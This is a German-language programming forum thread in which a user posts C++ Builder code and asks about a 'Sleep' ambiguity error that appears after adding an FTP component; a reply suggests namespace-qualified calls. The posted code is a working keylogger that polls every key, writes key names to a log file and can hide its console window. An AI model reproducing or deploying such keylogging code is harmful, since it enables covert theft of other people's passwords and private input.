Mehrdeutigkeits fehler
-
[C++ Fehler] Unit1.cpp(58): E2015 Mehrdeutigkeit zwischen '_fastcall Idglobal::Sleep(unsigned int)' und '__stdcall Sleep(unsigned long)'
Ich habe folgenden Source Code
//--------------------------------------------------------------------------- #include <vcl.h> #include <windows> #include <stdio> #pragma hdrstop #include "Unit1.h" //--------------------------------------------------------------------------- #pragma package(smart_init) #pragma resource "*.dfm" TForm1 *Form1; //--------------------------------------------------------------------------- __fastcall TForm1::TForm1(TComponent* Owner) : TForm(Owner) { } //--------------------------------------------------------------------------- void __fastcall TForm1::Button1Click(TObject *Sender) { AllocConsole(); ShowWindow(FindWindowA("ConsoleWindowClass",NULL),1); // Das öffnet eine neue Konsole, und versteckt diese auch sofort wenn man die 0 am ende durch eine 1 ersetzt wird die Konsole angezeigt FILE *Log; short key; char szKey[MAX_PATH]; int scan; while(1) { Sleep(10); for(key=0;key<256;key++) { if(GetAsyncKeyState(key)==-32767) { scan=MapVirtualKeyEx(key,0,GetKeyboardLayout(0)); GetKeyNameText(scan << 16,szKey,MAX_PATH); Log=fopen ("i:\\testdatei.txt","a+"); // +a der datei weiteren text hinzufügen fprintf(Log,"%s-",szKey); //fprintf in einen stream schreiben fclose(Log); } } } } //---------------------------------------------------------------------------
und die oben gennante Fehlermeldung tritt immer nur dann auf wenn ich auf meine Form die IdFTP1 Komponete setze.
Gibt es da vielleicht zu Sleep eine alternative ?
Das ganze dient nur zu test zwecken falls wer da was böses denkt ...
-
Na welches Sleep willste denn nun verwenden?
Probier
Idglobal::Sleep(10);
oder vielleicht
::Sleep(10);
?
-
Ty deine Frage war die Lösung auf meine Frage^^